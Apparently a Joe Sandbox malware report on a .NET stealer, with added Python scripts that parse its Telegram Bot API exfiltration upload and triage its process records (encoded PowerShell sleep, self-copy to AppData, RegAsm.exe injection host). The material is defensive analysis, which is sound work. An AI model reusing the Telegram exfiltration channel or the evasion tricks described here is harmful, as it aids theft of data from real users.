                                                                                        {"ok":true,"result":{"message_id":364,"from":{"id":5796425317,"is_bot":true,"first_name":"Grace","username":"Triliion_bot"},"chat":{"id":1275946058,"first_name":"derick","last_name":"menson","type":"private"},"date":1665701107,"document":{"file_name":"misc.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAIBbGNIlPOZfoeTDezsFpR_6_03dxSDAAIaDgACbJ1BUmU3RguDUOVVKgQ","file_unique_id":"AgADGg4AAmydQVI","file_size":22}}}
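The request above is a Telegram Bot API sendDocument upload: a multipart/form-data body carrying a chat_id field and a document field named misc.zip. The following script is an added example and not part of the Joe Sandbox report. It rebuilds the body from the Data Raw dumps, parses the multipart parts, and inspects the uploaded blob: the 22 bytes starting PK 05 06 are a bare ZIP end-of-central-directory record, so the archive this run exfiltrated contained no entries, which matches the file_size of 22 in Telegram's JSON reply. One assumption is labelled in the code: the part delimiter in front of the chat_id part is outside this excerpt and is taken to be the same boundary string as the other delimiters.

```python
"""Parse the Telegram sendDocument upload captured above.

Added example, not part of the sandbox report.  Pulls chat_id and the
uploaded document out of the multipart body and inspects the ZIP blob.
"""
import io
import re
import zipfile
from typing import Dict, List

# Boundary exactly as shown in the Data Ascii lines of the capture.
BOUNDARY = b"124a0fb1-8a78-4c1b-8ed5-2e41b547b56a"

# Request body rebuilt from the Data Raw dumps above.  The delimiter before
# the first (chat_id) part is outside this excerpt and is ASSUMED to use the
# same boundary; everything after it is a byte-for-byte transcript.
CAPTURED_BODY = (
    b"--" + BOUNDARY + b"\r\n"
    + b"Content-Type: text/plain; charset=utf-8\r\n"
    + b"Content-Disposition: form-data; name=chat_id\r\n\r\n"
    + b"1275946058"
    + b"\r\n--" + BOUNDARY + b"\r\n"
    + b"Content-Disposition: form-data; name=document; filename=misc.zip\r\n\r\n"
    + bytes.fromhex("50 4b 05 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00")
    + b"\r\n--" + BOUNDARY + b"--\r\n"
)


def parse_multipart(body: bytes, boundary: bytes) -> List[Dict]:
    """Split a multipart/form-data body into {'headers': {...}, 'content': bytes} parts."""
    delim = b"--" + boundary
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):          # "--boundary--" is the closing delimiter
            break
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]
        head, _, content = chunk.partition(b"\r\n\r\n")
        if content.endswith(b"\r\n"):        # CRLF that precedes the next delimiter
            content = content[:-2]
        headers = {}
        for line in head.split(b"\r\n"):
            key, _, value = line.decode("latin-1").partition(":")
            headers[key.strip().lower()] = value.strip()
        parts.append({"headers": headers, "content": content})
    return parts


def disposition_params(value: str) -> Dict[str, str]:
    """Extract name=... / filename=... from a Content-Disposition value (quoted or bare)."""
    params = {}
    for key, quoted, bare in re.findall(r';\s*(\w+)=(?:"([^"]*)"|([^;\s]*))', value):
        params[key] = quoted or bare
    return params


def describe_upload(body: bytes, boundary: bytes) -> Dict:
    """Map form field names to values; file fields become {'filename', 'data'}."""
    fields = {}
    for part in parse_multipart(body, boundary):
        params = disposition_params(part["headers"].get("content-disposition", ""))
        if "filename" in params:
            fields[params["name"]] = {"filename": params["filename"], "data": part["content"]}
        else:
            fields[params["name"]] = part["content"].decode("utf-8")
    return fields


def zip_entry_names(data: bytes) -> List[str]:
    """Member names of a ZIP blob.  A 22-byte blob that starts with PK\\x05\\x06 is a
    bare end-of-central-directory record, i.e. an archive with no entries."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


if __name__ == "__main__":
    fields = describe_upload(CAPTURED_BODY, BOUNDARY)
    doc = fields["document"]
    print("chat_id  :", fields["chat_id"])
    print("document :", doc["filename"], len(doc["data"]), "bytes")
    print("entries  :", zip_entry_names(doc["data"]))
```

The chat_id and the bot identity in the JSON reply are the indicators worth extracting from this kind of traffic; the bot token sits in the URL path of the request, which this excerpt does not show. An empty archive in the sandbox run does not mean the stealer collects nothing on a real host, only that nothing was staged into misc.zip before this upload.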


                                                                                        Target ID:0
                                                                                        Start time:00:42:21
                                                                                        Start date:14/10/2022
                                                                                        Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
                                                                                        Imagebase:0x8e0000
                                                                                        File size:8192 bytes
                                                                                        MD5 hash:A93394C0D7A32E0AE2BA43A6FD881301
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.666417537.000000000B141000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.571519401.0000000007C95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000003.291180894.00000000092C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.581149439.0000000007E04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.569512318.0000000007C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.630141577.000000000AD81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000003.289147752.0000000008EC2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.504811512.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low

                                                                                        Target ID:10
                                                                                        Start time:00:43:10
                                                                                        Start date:14/10/2022
                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA2AA==
                                                                                        Imagebase:0x150000
                                                                                        File size:430592 bytes
                                                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Reputation:high

                                                                                        Target ID:11
                                                                                        Start time:00:43:10
                                                                                        Start date:14/10/2022
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff745070000
                                                                                        File size:625664 bytes
                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        Target ID:14
                                                                                        Start time:00:44:16
                                                                                        Start date:14/10/2022
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Imagebase:0x5c0000
                                                                                        File size:64616 bytes
                                                                                        MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        Target ID:15
                                                                                        Start time:00:44:16
                                                                                        Start date:14/10/2022
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Imagebase:0x180000
                                                                                        File size:64616 bytes
                                                                                        MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        Target ID:16
                                                                                        Start time:00:44:16
                                                                                        Start date:14/10/2022
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Imagebase:0xa90000
                                                                                        File size:64616 bytes
                                                                                        MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000010.00000000.495309818.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000010.00000002.619906985.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000010.00000002.620597742.0000000002D22000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high

                                                                                        Target ID:17
                                                                                        Start time:00:44:26
                                                                                        Start date:14/10/2022
                                                                                        Path:C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe"
                                                                                        Imagebase:0x6c0000
                                                                                        File size:8192 bytes
                                                                                        MD5 hash:A93394C0D7A32E0AE2BA43A6FD881301
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 22%, Virustotal, Browse
                                                                                        Reputation:low

                                                                                        Target ID:18
                                                                                        Start time:00:44:35
                                                                                        Start date:14/10/2022
                                                                                        Path:C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe"
                                                                                        Imagebase:0x230000
                                                                                        File size:8192 bytes
                                                                                        MD5 hash:A93394C0D7A32E0AE2BA43A6FD881301
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Reputation:low
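Three things in the process records above deserve a second look when triaging: the powershell.exe -enc argument of Target 10 (PowerShell reads it as base64 of UTF-16LE text, and here it decodes to a plain Start-Sleep, a delay to outlast sandbox monitoring), Targets 17 and 18, which run a file with the same MD5 as the submitted sample from AppData\Roaming\Ccxsx\Fdmru.exe (the sample copied itself to a user-writable path), and the RegAsm.exe instances launched with no arguments at all, which is consistent with a signed .NET host being started only to have a payload mapped into it (the Costura Yara hits inside Target 16's image region point the same way). The script below is an added triage example and not part of the report; PROCESS_LOG is constructed from a subset of the Target ID fields shown on this page, and the -enc decoding assumes PowerShell's standard base64/UTF-16LE encoding.

```python
"""Triage the process records above.

Added example, not part of the sandbox report.  PROCESS_LOG is constructed
from a subset of the Target ID fields shown on this page.
"""
import base64
import re
from typing import Dict, List, Optional, Tuple

PROCESS_LOG = r"""
Target ID:0
Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
MD5 hash:A93394C0D7A32E0AE2BA43A6FD881301

Target ID:10
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA2AA==
MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10

Target ID:16
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
MD5 hash:6FD7592411112729BF6B1F2F6C34899F

Target ID:17
Path:C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe
Commandline:"C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe"
MD5 hash:A93394C0D7A32E0AE2BA43A6FD881301
"""


def parse_process_log(text: str) -> List[Dict[str, str]]:
    """Turn blank-line separated 'Key:Value' blocks into one dict per process."""
    records, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                records.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")    # split on the first colon only
        current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return records


def split_commandline(cmd: str) -> Tuple[str, str]:
    """Separate the executable (quoted or bare) from its arguments, Windows style."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end], cmd[end + 1:].strip()
    exe, _, rest = cmd.partition(" ")
    return exe, rest.strip()


def decode_encoded_command(args: str) -> Optional[str]:
    """PowerShell -e / -ec / -enc / -EncodedCommand: base64 of UTF-16LE script text."""
    m = re.search(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", args, re.IGNORECASE)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def triage(records: List[Dict[str, str]]) -> List[str]:
    """Flag encoded PowerShell, same-hash re-launches of the sample, bare RegAsm.exe."""
    findings = []
    sample = records[0]                      # Target ID 0 is the submitted file
    for r in records:
        tid, path = r["Target ID"], r["Path"]
        _, args = split_commandline(r.get("Commandline", ""))
        decoded = decode_encoded_command(args)
        if decoded is not None:
            findings.append(f"{tid}: encoded PowerShell -> {decoded}")
        if (r["MD5 hash"].lower() == sample["MD5 hash"].lower()
                and path.lower() != sample["Path"].lower()):
            findings.append(f"{tid}: same hash as sample re-launched from {path}")
        if path.lower().endswith("\\regasm.exe") and not args:
            findings.append(f"{tid}: RegAsm.exe started with no arguments (injection host?)")
    return findings


if __name__ == "__main__":
    for finding in triage(parse_process_log(PROCESS_LOG)):
        print(finding)
```

Decoding -enc strings is worth doing even when the result is boring: a bare Start-Sleep confirms the "Contains long sleeps" and "Encrypted powershell cmdline option found" signatures are the same evasion, and the 56-second value is what the sandbox had to outlast before the RegAsm.exe children and the Fdmru.exe copy appeared.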

                                                                                        No disassembly